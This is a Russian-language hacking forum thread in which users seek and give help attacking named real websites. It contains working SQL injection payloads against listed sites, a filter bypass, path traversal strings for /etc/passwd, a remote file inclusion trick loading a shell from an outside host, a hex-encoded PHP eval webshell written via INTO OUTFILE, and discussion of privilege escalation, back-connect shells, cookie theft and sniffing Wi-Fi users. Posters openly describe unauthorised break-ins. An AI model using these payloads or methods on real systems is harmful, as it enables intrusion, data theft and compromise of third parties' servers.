Извиняюсь за наверно банальный и многократно заезженный вопрос. Я пробую гуглить его сам, но на тот случай, если уже есть что-то простое, был бы рад услышать.

Все та же история с сервером. Если сократить ее, есть основной сервер, где я могу лишь читать открытые файлы, и есть тестовый (физически, они разные), где есть достаточно точная копия сайта с основного (нужных уязвимостей не удалось найти), и на этом сервере мне удалось залить php шелл, плюс на обоих серверах стоит webmin и есть основание предполагать, что у них есть общая пара логин/пароль без привязки по айпи (иными словами, предполагаю, что добыв лог/пасс с тестового, я смогу его задействовать на основном).

Так вот, насколько я понял, webmin для авторизации использует данные из shadow файла, который прочесть из-под apache пользователя, под которым работает шелл, нельзя, но очень нужно. Что можно попробовать предпринять в данной ситуации, есть ли какие-нибудь эксплоиты для его чтения? Главная цель - залить шелл на основной сервер.

надо поднимать права

Да, насчет поднятия прав логично, вопрос в способах поднятия прав (наверно стоило прямо спросить про поднятия, но оставил в общем виде на случай, если это не единственный способ прочесть рутовый файл). Есть ли что-то, на что стоит обратить внимание, что вероятно сработает?

UPD: забыл уточнить. Само по себе линукс ядро на сервере достаточно старое (2.6.18), и эксплоитов, как я понял, на него достаточно много. Дилемма в том, что некоторые эксплоиты наверно не совместимы с php шеллом (т.е. я опасаюсь, что при попытке запустить эксплоит, шелл либо повиснет вместе с апачем, либо рут запустится отдельным процессом - такого рода). Всякий ли рабочий экплоит с повышением прав подойдет?

UPD2: ок, я стормозил (верней, я не знал), в шелле можно через back-connect подключиться к серверу по терминалу, так что вопрос теперь лишь непосредственно в повышении привилегий любым эксплоитом.

Помогите раскрутить:


Code:
cafe.funizen[antigoogle]com/sub/customer/news.html?keyword=&ktype=&pageID=%5c
или
cafe.funizen[antigoogle]com/sub/customer/improvement_view.html?board_seq=\

sav77 said:
Помогите раскрутить:

Code:
cafe.funizen[antigoogle]com/sub/customer/news.html?keyword=&ktype=&pageID=%5c
или
cafe.funizen[antigoogle]com/sub/customer/improvement_view.html?board_seq=\



POST

http://cafe.funizen.com/sub/member/login_ok.html


Code:
m_id=%5c'or(select 1 from(select max(rand(0))from(information_schema.tables)group by concat(user(),version(),hex(rand(0))))aa)-- w&m_pwd=qwrqw

есть форум phpbb 2, Восстановить БД - неработает, стили тоже, как еще можно залится?

qaz said:
есть форум phpbb 2, Восстановить БД - неработает, стили тоже, как еще можно залится?


А если БД в ручном режиме залить по частям.

Помогите доковырять

http://forum-auto.ru/news.php?part=car&page_normal=2'

AHTNkiller said:
Помогите доковырять
http://forum-auto.ru/news.php?part=car&page_normal=2'


Инъекция в limit + присутствует в запросе order by = "доковырять" не получится

Code:
http://www.demotywuje.pl/uzytkownik/Katri/strona/'17/

Такой вопрос - на админке сайта стоит фильтр по айпи, через .htaccess и в РНР коде. Прогуглив вопрос о попытках подмены айпи, народ как правило говорил, что айпи поменять конечно можно, но тогда и сервер будет слать ответ на поддельный айпи. Так вот, вопрос в том, возможно ли при таком раскладе, подменив айпи на подходящий, в одностороннем порядке отправить запрос на аплоад файла? Т.е. мне вобщем-то не нужен ответ от сервера, если он просто молча зальет к себе шелл, благо доступ к залитому файлу ничем не будет ограничен.

Такой вариант возможен? Или из-за процедуры инициализации соединения, механики аплоада или чего-то подобного это нереально?

Rextor said:
Такой вопрос - на админке сайта стоит фильтр по айпи, через .htaccess и в РНР коде. Прогуглив вопрос о попытках подмены айпи, народ как правило говорил, что айпи поменять конечно можно, но тогда и сервер будет слать ответ на поддельный айпи. Так вот, вопрос в том, возможно ли при таком раскладе, подменив айпи на подходящий, в одностороннем порядке отправить запрос на аплоад файла? Т.е. мне вобщем-то не нужен ответ от сервера, если он просто молча зальет к себе шелл, благо доступ к залитому файлу ничем не будет ограничен.
Такой вариант возможен? Или из-за процедуры инициализации соединения, механики аплоада или чего-то подобного это нереально?


При установке соединения с сервером, можно указать абсолютно любой ип, хоть пентагона или гугла, для этого в tcp пакете отведены определенные байты для указания ип источника, дабы потом ему отправить ответ, только вот после того, как вы пошлете ему пакет с флагом syn, он ответит тому, кто его якобы отправил, но тот, кто его отправлял естественно не примет этот пакет и соединение даже не установится, не говоря уже про посылку каких-либо данных по нему.)

Что и следовало ожидать, жаль.

Rextor said:
Такой вопрос - на админке сайта стоит фильтр по айпи, через .htaccess и в РНР коде. Прогуглив вопрос о попытках подмены айпи, народ как правило говорил, что айпи поменять конечно можно, но тогда и сервер будет слать ответ на поддельный айпи. Так вот, вопрос в том, возможно ли при таком раскладе, подменив айпи на подходящий, в одностороннем порядке отправить запрос на аплоад файла? Т.е. мне вобщем-то не нужен ответ от сервера, если он просто молча зальет к себе шелл, благо доступ к залитому файлу ничем не будет ограничен.
Такой вариант возможен? Или из-за процедуры инициализации соединения, механики аплоада или чего-то подобного это нереально?


Не установится соединение. В широком смысле, на больших дистанциях спуфинг в tcp крайней сложно реализуем. Попробуйте зайти с другой стороны, субд, фтп, ссх и прочее.

Пробовал. СУБД локально доступна только через инъекцию (прав на запись нет), удаленно - не настроен сервис в принципе. FTP отгорожен полностью через hosts.deny, ssh доступен лишь для нескольких айпи адресов через hosts.allow/deny. Каких-либо уязвимостей на исполнение кода в коде сайта найти не удалось. Наружу смотрят лишь Postfix, Dovecot, Apache и Webmin. На руках лишь чтение общих файлов системы через php и select инъекция для mysql.

Самое обидное то, что в отличие от другого сайта, где у меня есть шелл, но нет возможности поднять привилегии, этот сайт, судя по версии ядра, очень хорошо рутается.

Rextor said:
Пробовал. СУБД локально доступна только через инъекцию (прав на запись нет), удаленно - не настроен сервис в принципе. FTP отгорожен полностью через hosts.deny, ssh доступен лишь для нескольких айпи адресов через hosts.allow/deny. Каких-либо уязвимостей на исполнение кода в коде сайта найти не удалось. Наружу смотрят лишь Postfix, Dovecot, Apache и Webmin. На руках лишь чтение общих файлов системы через php и select инъекция для mysql.
Самое обидное то, что в отличие от другого сайта, где у меня есть шелл, но нет возможности поднять привилегии, этот сайт, судя по версии ядра, очень хорошо рутается.


Попробуйте залиться через соседей, прочтя конфиг через local load infile в мускуле.

Аналогично, пробовал Изначально у меня был один сайт, про который я и писал сейчас. Через конфиги узнал, что у него есть "зеркало" на отдельном сервере (тестовая версия), на котором еще было много соседних сайтов, один из которых был уязвим, что позволило залить шелл на второй сервер и сделать копию интересуемого сайта для более полного анализа. К сожалению, новых уязвимостей на первом сайте/сервере найти все равно не удалось.

Привет хацкеры)Учусь sql-inj,но не могу найти ответа в гугле)

Для проверки сайта на скули обязательно урл вида


index1.php?id=1 или user=1


,т.е обязательно урл должен заканчиваться на значение параметра?

Просто на данном сайте


http://onecapper.ru


всё переименовано,для красоты или же в целях безопасности)

Если возможно поподробнее)

CoolHucker

инъекция может быть где угодно POST\ GET и в кукисах, заголовках.

CoolHucker said:
Привет хацкеры)Учусь sql-inj,но не могу найти ответа в гугле)
Для проверки сайта на скули обязательно урл вида ,т.е обязательно урл должен заканчиваться на значение параметра?
Просто на данном сайте всё переименовано,для красоты или же в целях безопасности)
Если возможно поподробнее)


https://forum.antichat.net/thread50572.html

Спс керберус)где почитать не подскажешь? Просто там страницы типа,а в мануалах значения =1 =4 и тд)


http://onecapper.ru/garantii-n
http://onecapper.ru/prays-list


Как проверить на скули?Web-Cruiser-lol

P.S Плюхи раздал

Знатоки!! Помогите раскрутить одну SQL.

URL привести не могу, вот полный SQL запрос:


Code:
SELECT DISTINCT sc.id,sc.published,sc.template,sc.pagetitle FROM table sc LEFT JOIN table2
dg on dg.document = sc.id WHERE sc.id IN (1,2,3) AND sc.published=1 AND sc.deleted=0 AND (sc.privateweb=0) GROUP BY sc.id ORDER BY sc.pagetitle [SQL_HERE]

Там где [SQL_HERE], соответственно имеем иньект. На его место я вставляю:


Code:
(1)OR(SELECT(1)FROM(SELECT COUNT(0),CONCAT((SELECT(CONCAT_WS(VERSION(),(SELEC T VERSION())))),FLOOR(RAND(0)*2))FROM(INFORMATION_SC HEMA.TABLES) GROUP BY 2)A)

И на первый взгляд всё работает, выдаётся Duplicate entry '5.4.32' for key 'group_key'

Но как только я пытаюсь вывести информацию из любой таблицы, к примеру таким SQL запросом:


Code:
SELECT DISTINCT sc.id,sc.published,sc.template,sc.pagetitle FROM table sc LEFT JOIN table2
dg on dg.document = sc.id WHERE sc.id IN (1,2,3) AND sc.published=1 AND sc.deleted=0 AND (sc.privateweb=0) GROUP BY sc.id ORDER BY sc.pagetitle
(1)OR(SELECT(1)FROM(SELECT COUNT(0),CONCAT((SELECT(CONCAT_WS(VERSION(),(SELEC T COUNT(*) from table)))),FLOOR(RAND(0)*2))FROM(INFORMATION_SCHEMA .TABLES) GROUP BY 2)A)

Я получаю неизвестную для меня ошибку: Table 'table' doesn't exist

И как бы я не крутил SQL, от неё избавиться никак не могу.

Буду благодарен если кто подскажет как правильно составить SQL запрос в моем случае, чтобы выудить произвольную информацию из доступных таблиц.

Спасибо.

Сбербанк said:
Знатоки!! Помогите раскрутить одну SQL.
URL привести не могу, вот полный SQL запрос:

Code:
SELECT DISTINCT sc.id,sc.published,sc.template,sc.pagetitle FROM table sc LEFT JOIN table2
dg on dg.document = sc.id WHERE sc.id IN (1,2,3) AND sc.published=1 AND sc.deleted=0 AND (sc.privateweb=0) GROUP BY sc.id ORDER BY sc.pagetitle [SQL_HERE]

Там где [SQL_HERE], соответственно имеем иньект. На его место я вставляю:

Code:
(1)OR(SELECT(1)FROM(SELECT COUNT(0),CONCAT((SELECT(CONCAT_WS(VERSION(),(SELEC T VERSION())))),FLOOR(RAND(0)*2))FROM(INFORMATION_SC HEMA.TABLES) GROUP BY 2)A)

И на первый взгляд всё работает, выдаётся Duplicate entry '5.4.32' for key 'group_key'
Но как только я пытаюсь вывести информацию из любой таблицы, к примеру таким SQL запросом:

Code:
SELECT DISTINCT sc.id,sc.published,sc.template,sc.pagetitle FROM table sc LEFT JOIN table2
dg on dg.document = sc.id WHERE sc.id IN (1,2,3) AND sc.published=1 AND sc.deleted=0 AND (sc.privateweb=0) GROUP BY sc.id ORDER BY sc.pagetitle
(1)OR(SELECT(1)FROM(SELECT COUNT(0),CONCAT((SELECT(CONCAT_WS(VERSION(),(SELEC T COUNT(*) from table)))),FLOOR(RAND(0)*2))FROM(INFORMATION_SCHEMA .TABLES) GROUP BY 2)A)

Я получаю неизвестную для меня ошибку: Table 'table' doesn't exist
И как бы я не крутил SQL, от неё избавиться никак не могу.
Буду благодарен если кто подскажет как правильно составить SQL запрос в моем случае, чтобы выудить произвольную информацию из доступных таблиц.
Спасибо.


Table 'table' doesn't exist - может быть нет такой таблицы?

ребята подскажите в чем проблема и как ее исправить, какие опции лучше поставить в sqlmap, сканер показал что есть слепые, причем многочисленные, но когда начинаю работать sqlmap,ом выдает после работы ошибку [WARNING] HTTP error codes detected during run:

403 (Forbidden) - 253 times, 500 (Internal Server Error) - 105 times

линк

https://login01.stockholm.se/siteminderagent/formsja/DynamicRetry.fcc

POST

SMENC=SHIFT_JIS&SMLOCALE=JP-jp&USER=&PASSWORD=&target=&smauthreason=&smagentname=%27+and+%27f%27%3D%27f%27+--+&postpreservationdata=

помогите люди советом и подсказкой

Здраствуйте, изучаю metasploit. пытаюсь создать соединение с удаленным доступом, используя экзешник, и хандлер.Локально все работает прекрасно, но увы, глобально нет.

Hadler failed to bind . пробовал и на виртуалке, и грузится с флешки, все равно так. порты открыты, пробовал менять и 4444 и 5555 итд..не получается.можете что-нибудь посоветовать?

danil911 said:
Здраствуйте, изучаю metasploit. пытаюсь создать соединение с удаленным доступом, используя экзешник, и хандлер.Локально все работает прекрасно, но увы, глобально нет.
Hadler failed to bind . пробовал и на виртуалке, и грузится с флешки, все равно так. порты открыты, пробовал менять и 4444 и 5555 итд..не получается.можете что-нибудь посоветовать?


для работы с удаленным необходим прямой сервер

Такой вопрос, наверно банальный, но пока не дошло.

Мне каким-то невероятный чудом удалось найти пароль от юзера, который с высокой долей вероятностью обладает правами суперюзера. Насколько я знаю, узнать наверняка, является ли он суперюзером, это попытаться выполнить какую-нибудь команду через sudo. Проблема в том, что мой шелл - я пробовал https://github.com/creaktive/tsh - почему-то все равно не дружит с sudo, хотя вроде как есть имитация tty (sorry, you must have a tty to run sudo shell). Какой шелл дружит с sudo или как иначе проверить судошность аккаунта?

Upd: рядом лежал пароль от рута, так что вопрос о судо частично отпал, но все равно интересно, как же можно было поступить Жаль, пароль не подходит для логина на основном сервере, только для зеркала, но возможно я смогу найти что-нить еще.

Rextor said:
Такой вопрос, наверно банальный, но пока не дошло.
Мне каким-то невероятный чудом удалось найти пароль от юзера, который с высокой долей вероятностью обладает правами суперюзера. Насколько я знаю, узнать наверняка, является ли он суперюзером, это попытаться выполнить какую-нибудь команду через sudo. Проблема в том, что мой шелл - я пробовал https://github.com/creaktive/tsh - почему-то все равно не дружит с sudo, хотя вроде как есть имитация tty (sorry, you must have a tty to run sudo shell). Какой шелл дружит с sudo или как иначе проверить судошность аккаунта?
Upd:
рядом лежал пароль от рута, так что вопрос о судо частично отпал, но все равно интересно, как же можно было поступить
Жаль, пароль не подходит для логина на основном сервере, только для зеркала, но возможно я смогу найти что-нить еще.


Правами суперюзера обладает только суперюзер - ваш кэп. Tty-like != tty, хотя есть обработчики su\sudo, сам такой когда-то писал. Вы, вероятно, забыли про ssh. Коннектитесь, проверяйте. Если доступ есть со стороны шелла, но нет пароля, просто допишите авторизацию по сертификатам.

Ну, мб я не совсем корректно выразился, возможно я просто неточно знаю механику работы sudo. Так или иначе, с паролей рута я смог просто использовать su -c 'cmd' root

Про ssh я не забывал, я просто не мог им пользоваться из-за фильтрации адреса.

У меня тут такая проблема: я взломал сервак, слил оттуда таблицу mysql.users. В ней был юзер с привелегией на удаленное подключение (% в колонке Host). Я сбрутил его пароль и стал пробовать подключиться к базе. Пробил IP сайта и сделал следующее:


PHP:
','','');

f(!$link) {

die('Could not connect: '.mysql_error() );

}

echo'Connected successfully';

mysql_close($link);

?>

Оно выдает:

Could not connect: Попытка установить соединение была безуспешной, т.к. от другого компьютера за требуемое время не получен нужный отклик, или было разорвано уже установленное соединение из-за неверного отклика уже подключенного компьютера.

В чем моя ошибка?

Есть вероятность, что установлена фильтрация айпи-адреса. Проверь /etc/hosts.allow и /etc/hosts.deny. Плюс, может быть там используется нестандартный номер порта (если вообще mysql настроена принимать удаленные подключения). Подключение идет локально на сервере или от себя (я так полагаю, что удаленно, просто использовать php для этого несколько странно)?

Mints97 said:
У меня тут такая проблема: я взломал сервак, слил оттуда таблицу mysql.users. В ней был юзер с привелегией на удаленное подключение (% в колонке Host). Я сбрутил его пароль и стал пробовать подключиться к базе. Пробил IP сайта и сделал следующее:

PHP:
','','');

f(!$link) {

die('Could not connect: '.mysql_error() );

}

echo'Connected successfully';

mysql_close($link);

?>

Оно выдает:
Could not connect: Попытка установить соединение была безуспешной, т.к. от другого компьютера за требуемое время не получен нужный отклик, или было разорвано уже установленное соединение из-за неверного отклика уже подключенного компьютера.
В чем моя ошибка?


Действительно, прежде всего попробуйте подключиться обычным клиентом.

Обычный клиент тоже не пускает.

P.S. это не тот сайт, на котором LFI. Файлы я на нем читать не могу.

Если я правильно понял, то у тебя есть админская учетная запись для БД, а значит у нее есть права на чтение и запись файлов, например select load_file('/etc/passwd').

psihoz26 said:
http://leto[антигугол].az/photos.php?lang=ru&id='p569&back_id=aqua
+1 к карме тому кто поможет раскрутить


/thread18883.html пункт 6

p.s:Обычное раскрытие путей, кавычки слешируются!

Вопрос тем людям с нестандартными взглядами, что держат сервера на будунте. У вас там апач часом не через суперсервер запускается? Где лежат конфиги\логи по дефолту? Апач второй ветки, бубунта 12.04. Аналогично с nginx.

Ответ скорей всего отрицательный, но все же - возможно ли выполнить локальные команды при ssh подключении (т.е. выполнить команду не на стороне подключенной машины, а на стороне инициатора соединения)?

Rextor said:
Ответ скорей всего отрицательный, но все же - возможно ли выполнить локальные команды при ssh подключении (т.е. выполнить команду не на стороне подключенной машины, а на стороне инициатора соединения)?


Без усилий со стороны инициатора, нет, невозможно. Максимум, что есть - переменные $SSH_CLIENT с адресом клиента и ~/.bashrc, выполняющийся при открытии терминала.

Сталкнулся с проблемой использования альтернативы null byte

обычно я вставлял такой пэйлоад


../../../../../../../../../../../../../../../etc/passwd/././././[ещё 10к точка слеш]././././


и если он не срабатывал вставлял такой


../../../../../../../../../../../../../../..//etc/passwd/././././[ещё 10к точка слеш]././././


и один из двух точно срабатывал

но сегодня я столкнулся с проблемой 10к ./ обрезаются в запросе до 4054 и изза этого похоже буфер не переполняется. Скажите это типо защита такая от альтернативы нулл байту? или что? возможно ли чтото сделать в этом случае?

как такие скули раскручивают?


PHP:
http://www.clinzdrav.ru/index.php?rubr=pages&page=search&search_cond=AND&search_str=9999'

psihoz26

это просто такая настройка веб сервера для URL

подскажите, хочу сделать раздачу WI FI со своего ноутбука, чем снифать входящий трафик? так понимаю cain не катит? да и не удобен будет

iql said:
подскажите, хочу сделать раздачу WI FI со своего ноутбука, чем снифать входящий трафик? так понимаю cain не катит? да и не удобен будет


cain - престарелый парольный снифер. Вам больше подойдет wireshark\tcpdump\tshark где угодно между клиентом и интернетами, в т.ч. на вашем ноутбуке.

Pro100Nyan said:
Вообщем, знаю что можно залить шелл через скулю, типа не искать админку и логин и хеш к ней. А можно сразу залить в директорию , но нужны права на запись и чтение, и знать дерикторию. Скажите как именно это делают и как все проверяют, или ссылку на мануал дайте. спасибо


ссылка на мануал (https://antichat.live/threads/43966/)

Знаю, что заезженно, но от этого не легче.

Какие основные способы определения полного пути до директории сайта на сервере? Насколько я вижу, на сервере хостится несколько поддоменов сайта (которые вобщем-то почти ничем не отличаются), /etc/apache2/httpd.conf нет (зато есть /etc/apache2/apache2.conf, из чего могу сделать вывод, что httpd.conf скорей всего вообще нет на сервере), потому видимо конфиги хранятся в поддиректории ./sites-available/ ./sites-enabled/. Доступа к /proc нет, чтение файлов через слепую sql инъекцию (потому особо наугад файлы не почитаешь, модемный коннект - рай земной в сравнении со скоростью чтения через инъекцию).

Upd: я идиот, сказочный. После кучи часов, копаясь по БД в час по чайной ложке, я смог найти путь до каталога сайта. И тут я решил проверить другую страницу на уязвимость, и узнал, что я мог делать полные запросы к базе данных. Убейте меня...

madhatter said:
cain - престарелый парольный снифер. Вам больше подойдет wireshark\tcpdump\tshark где угодно между клиентом и интернетами, в т.ч. на вашем ноутбуке.


подскажи а кукис когда ворую, если человек закончил сессию, они уже не действительны?

Rextor said:
Знаю, что заезженно, но от этого не легче.
Какие основные способы определения полного пути до директории сайта на сервере? Насколько я вижу, на сервере хостится несколько поддоменов сайта (которые вобщем-то почти ничем не отличаются), /etc/apache2/httpd.conf нет (зато есть /etc/apache2/apache2.conf, из чего могу сделать вывод, что httpd.conf скорей всего вообще нет на сервере), потому видимо конфиги хранятся в поддиректории ./sites-available/ ./sites-enabled/. Доступа к /proc нет, чтение файлов через слепую sql инъекцию (потому особо наугад файлы не почитаешь, модемный коннект - рай земной в сравнении со скоростью чтения через инъекцию).
Upd:
я идиот, сказочный. После кучи часов, копаясь по БД в час по чайной ложке, я смог найти путь до каталога сайта. И тут я решил проверить другую страницу на уязвимость, и узнал, что я мог делать полные запросы к базе данных. Убейте меня...


Конфиги, как уже сказали, да - один из основных способов. Однако, здесь проблема - они модульные, во-первых, в разных демонах и дистрах\сборках по разным путям, а доступа к ним может и не быть. Переменные окружения и procfs - тоже вариант. Более удобно, на мой взгляд, раскрытие путей и phpinfo, их часто можно встретить.

И да, бага редко ходит одна Рядом со сложной и слепой и инъекцией может быть возможность стекованных запросов.


подскажи а кукис когда ворую, если человек закончил сессию, они уже не действительны?


Плюшки могут быть невалидными в ряде случаев:

1) Истечение выданного срока годности.

2) Закрытие сессии клиентом. Т.е. session_close или удаление сессий из базы. Проще говоря, нажатая кнопка "выход".

3) Несовпадение по UA\ip. Присутствует не всегда, зависит от конкретной серверной реализации. Некоторые сервисы в таких случаях могут помечать их как неактивные и даже настоящий клиент не сможет больше с ними зайти.

Мой комп раздает WI-FI, думал ставить свой днс и перенаправлять на нужные мне сайты, возможно ли перенаправлять компьютеры получающие доступ через мой вай фай, изменением записей хостс на своем компе?

iql said:
Мой комп раздает WI-FI, думал ставить свой днс и перенаправлять на нужные мне сайты, возможно ли перенаправлять компьютеры получающие доступ через мой вай фай, изменением записей хостс на своем компе?


Вы уж либо попросите модеров соседнюю тему сюда дернуть, либо только там такие вопросы поднимайте. По сути, эта тема подходит для данной тематики.

Столкнулся сегодня с такой фигнёй

http://пятаяпередача.рф/automobile_details_list.php?id=699+order+by+2--+

Unknown column '2' in 'order clause'

http://пятаяпередача.рф/automobile_details_list.php?id=699+order+by+1--+

ошибк нету, тоесть колонка одна

запрос,

http://пятаяпередача.рф/automobile_details_list.php?id=699+union+select+1--+

The used SELECT statements have a different number of columns

чёза нафиг? почему так? (Раскурутка через еррор басед не интересует)

qaz said:
Столкнулся сегодня с такой фигнёй
http://пятаяпередача.рф/automobile_details_list.php?id=699+order+by+2--+
Unknown column '2' in 'order clause'
http://пятаяпередача.рф/automobile_details_list.php?id=699+order+by+1--+
ошибк нету, тоесть колонка одна
запрос,
http://пятаяпередача.рф/automobile_details_list.php?id=699+union+select+1--+
The used SELECT statements have a different number of columns
чёза нафиг? почему так? (Раскурутка через еррор басед не интересует)


/showpost.php?p=497033&postcount=10

создаю сайт на своем пк через денвер, если адрес стоит 127.0.0.1 то все хорошо, но стоит пописать локальный или интернет адрес, как сайт загружается еле еле без картинок и прочей фигни, кодировка верная, но ничег оен помогает

поиграй с / ./ перед адресом папки ведущей до сss/картинок, проверь права на фаилы и директории.

e17 said:
поиграй с / ./ перед адресом папки ведущей до сss/картинок, проверь права на фаилы и директории.


там всего 3 файла фейка

Кому не сложно, то.

Подскажите как sqlmap`у скормить SQL вида:

http://target.ru/sometext/[SQL]/sometext.html

Нигде не нашёл описание как скармливать такие ссылки.

И заодно, как раскручивать через него SQL в заголовках? В частности заголовок user_agent, или переменная окружения QUERY_STRING ? Когда sql идёт таким образом: http://target.ru/'SQL

Спасибо.

Грабитель said:
Кому не сложно, то.
Подскажите как sqlmap`у скормить SQL вида:
http://target.ru/sometext/[SQL]/sometext.html
Нигде не нашёл описание как скармливать такие ссылки.
И заодно, как раскручивать через него SQL в заголовках? В частности заголовок user_agent, или переменная окружения QUERY_STRING ? Когда sql идёт таким образом: http://target.ru/'SQL
Спасибо.


Не пробовали документацию читать?

Называет custom injection marker:

http://taget.com/some/*/some.txt

Вместо "*" втыкается пейлоад. Для ua, если не путаю, -p User-Agent.

unic0rn said:
Господа, как заканчивать запрос правильно? "--" не помогает в запросах что-то типа "group by 100 --
and msg_enable >0 an' at line 7
"


-- есть однострочный комментарий, после которого обязательно должен следовать пробел. Попробуйте также ставить '-- x', чтобы браузер или trim не обрезали пробел в конце. Также возможно, что запрос просто многострочный, некоторые программисты любят городить такие на пару листов. Незакрытый /* может иногда помочь. К тому же, -- специфичен для некоторых субд, в число которых ваша может не входить, а шарп(#) как бы generic sql comment. Также можно попробовать не комментировать остаток, а завернуть его корректно по логике и синтаксису.

............

........

Anat said:
Почему при запросе http://en.asiadcp.com/company/products.php?id=-119882+union+select+1,2,group_concat(email,0x3a,co ntact),4,5+from+asiadcp.middle-- выводятся только несколько записей?


/showthread.php?p=1255763

Вопрос магистрам sql:

Есть читалка sql из файла, выполняет все запросы построчно. Но если в начале запроса не присутствует insert into, она его насильно добавляет, точки с запятой вырезаются. Как бы так завернуть insert into или сделать local load подзапросом или вроде того?

Есть скуля, как обойти фильтрацию на "select", на слово "select" выдает 403 Forbidden, пример запроса

?id=1'or(ExtractValue(1,concat(0x3a,(select(count( *))from(website.user)))))=1

Sanic1977 said:
Есть скуля, как обойти фильтрацию на "select", на слово "select" выдает 403 Forbidden, пример запроса
?id=1'or(ExtractValue(1,concat(0x3a,(select(count( *))from(website.user)))))=1


SeLeCt

%73elect

kingbeef said:
SeLeCt
%73elect


Так не работает, есть еще идеи?

Кто может помочь подобрать столбцы на Jooml'e


Code:
http://kinokerch.ru/index.php?option=com_datsogallery&Itemid=30&limitstart=20'

Ребят, надо проучить кидал..


Code:
http://shop-console.com.ua/contact%27

Кидала (https://vk.com/wall-19521099_1369)

Добрый вечер. нашёл на сайте RFI. но есть одно НО.

к примеру ссылка вида http://site.com/index.php?id=user и при добавлении лишнего символа выдаётся:

"Warning: include(user'.php) [function.include]: failed to open stream: No such file or directory in..."

как видите сервер добавляет обязательное расширение ".php".

вопрос следущий: можно ли как-нибудь выполнить shell что бы он выполнялся на стороне жертвы? 0 байт не проходит. посоветовали - со своего сервера отдать файл с расширением .php как простой текст. как это можно сделать?

korih said:
Добрый вечер. нашёл на сайте RFI. но есть одно НО.
к примеру ссылка вида http://site.com/index.php?id=user и при добавлении лишнего символа выдаётся:
"Warning: include(user'.php) [function.include]: failed to open stream: No such file or directory in..."
как видите сервер добавляет обязательное расширение ".php".
вопрос следущий: можно ли как-нибудь выполнить shell что бы он выполнялся на стороне жертвы? 0 байт не проходит. посоветовали - со своего сервера отдать файл с расширением .php как простой текст. как это можно сделать?


если действительно rfi, то подставь вот эту ссылку http://hastebin.com/raw/iwafoxapuw вместо user и посмотри выведет ли phpinfo

PHP Version 5.1.6

да, вывело

korih said:
PHP Version 5.1.6
да, вывело


ну вот, дальше уже сам =)

smirk said:
ну вот, дальше уже сам =)


а как мне сделать, что бы выполняло php код со стороны жертвы, а не моего сервера? объясни пожалуйста) потому что когда я делаю инклуд на php файл своего сервера, то он выполняется на моём сервере. *txt я не могу поставить расширение т.к. сайт жертвы добавляет *.php

Предложи ему такую ссылку:

http://elitehacker.ru/shell.txt?

(с вопросом на конце)

есле помог жми +

Ganz Euler said:
Предложи ему такую ссылку:
http://elitehacker.ru/shell.txt?
(с вопросом на конце)
есле помог жми +


не видит. этот сайт не видет даже в браузере) но за попытку спасибо

пошло-поехало! ура! действительно, всё что надо было, это поставить в конце "?". спасибо большое Ganz Euler)

Ребят, помогите - нашел уязвимость с 6 полями, но выводить их не хочет...

Слепая ли это и как раскрутить правильно...

http://po.poltava.ua/main.php?l=1+UNION+SELECT+1,2,3,4,5,6--

спасибо...

LelouchMe said:
Ребят, помогите - нашел уязвимость с 6 полями, но выводить их не хочет...
Слепая ли это и как раскрутить правильно...
http://po.poltava.ua/main.php?l=1+UNION+SELECT+1,2,3,4,5,6--
спасибо...


title смотрите.

LelouchMe said:
Ребят, помогите - нашел уязвимость с 6 полями, но выводить их не хочет...
Слепая ли это и как раскрутить правильно...
http://po.poltava.ua/main.php?l=1+UNION+SELECT+1,2,3,4,5,6--
спасибо...


http://po.poltava.ua/main.php?l=1+UNION+SELECT+1,2,3,4,version(),6--

Все выводит.

Добрый день! Подскажите пожалуйста, по заливке шелла

Заливаю файл через phpmyadmin под пользователем root. File_priv=Y Grant_priv=Y

Знаю полный путь до сайта через phpinfo, и знаю точные папки доступные под запись.

В /tmp заливается без проблем файл и считывается тоже.

Подскажите почему отказывается заливать в нужную папку сайта, если права позволяют? Пробовал залить файл через админку сайта - всё норм заливается.

Evil_Genius said:
Подскажите почему отказывается заливать в нужную папку сайта, если права позволяют? Пробовал залить файл через админку сайта - всё норм заливается.


Вы уверены, что папки доступны на запись? INTO OUTFILE/DUMPFILE действуют из под юзера mysql, а сайт, вероятно, через www-root.

XAMEHA said:
Вы уверены, что папки доступны на запись? INTO OUTFILE/DUMPFILE действуют из под юзера mysql, а сайт, вероятно, через www-root.


Да действительно, сейчас залился через админку netcat. Права на сайт полные, но юзер какраз другой. Видимо из-за этого и не заливалось((

Задача: нужно сдампить 3 колонки с помощью sqlmap

column1 - int

column2,3 - varchar

Но почему то дампится только одна колонка

По отдельности, все нормально. В чем может быть причина?

Синтаксически запрос составляю верно

Привет, прошу помощи:

Есть asp сайт, при помощи ' or 1=1-- в поле пассворд можно залогинится под юзером, я так полагаю под 1 юзером в бд, но это не админ.

Как-то можно раскрутить это?


PHP:
Microsoft VBScript runtime error'800a000d'Type� �mismatch:'Cint'

вот еще, помогите пожалуйста, а то не знал, не знал да и забыл все в скулях

UPDATE


PHP:
Microsoft OLE DB ProviderforSQL Server error' 80040e14'Unclosed quotation mark after the ch aracter string'8''.

при .asp?itemkey=12345678' проблема в том что стоит фильтир, если неравно 9 символом, то выскакивает еррор пейдж, есть ли возможность обойти?///

UPD

есть blind MSsql inj, подкиньте маны, а то гугл не помогает

//

karoche mana est'

теперь нужен софт для раскрутки blind MSSQL injection, или кто гуру - какие параметры кормить sqlmap?

иньекция в поле пассворд, логика


PHP:
password=''or {MY STATEMENT HERE}

как-то так

ПС

походу надо писать софт, ибо если руками перебирать то можно в психушку попасть

АПДЕЙТ

Я еще не в психушке, хорошый мануал по ms sql _ttp://www.exploit-db.com/papers/12975/

Может ли быть xss в ответе аякса если не фильтруются ?

пробовал добавлять html / body head и т.п.

ничего не выходило

psihoz26 said:
Может ли быть xss в ответе аякса если не фильтруются ?
пробовал добавлять html / body head и т.п.
ничего не выходило


Вероятно, сервер отдает Content-Type: text/*

Поведение разных версий браузеров может варьироваться.

Условия:

1. File_priv: Y

2. Возможно читать файлы

3. Возможное раскрытие путей через Wordpress

4. Заливка файла через INTO OUTFILE - возможна.

Всё-бы нечего, НО:

Начнём историю по порядку - во-первых на самом сайте через wp-config запрещён доступ к theme-editor и plugin-editor всем пользователям.

Но я не отчаивался, т.к. File_priv: Y.

Всё вроде бы ничего и даже получил раскрытие путей, однако:


/home/httpd/html/site/shared/wp/live/


Уже это насторожило, т.к. сам блог находится по адресу site.com/blog/, но я не сдавался и шел по избранному мною пути:

1.


+union+select+1,2,3,0x273c203f706870206576616c2824 5f524551554553545b636d645d293b203f3e27,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20+from+mysql.user+in to+outfile+'/home/httpd/html/site/shared/wp/live/wp-content/vvvvv.php'--
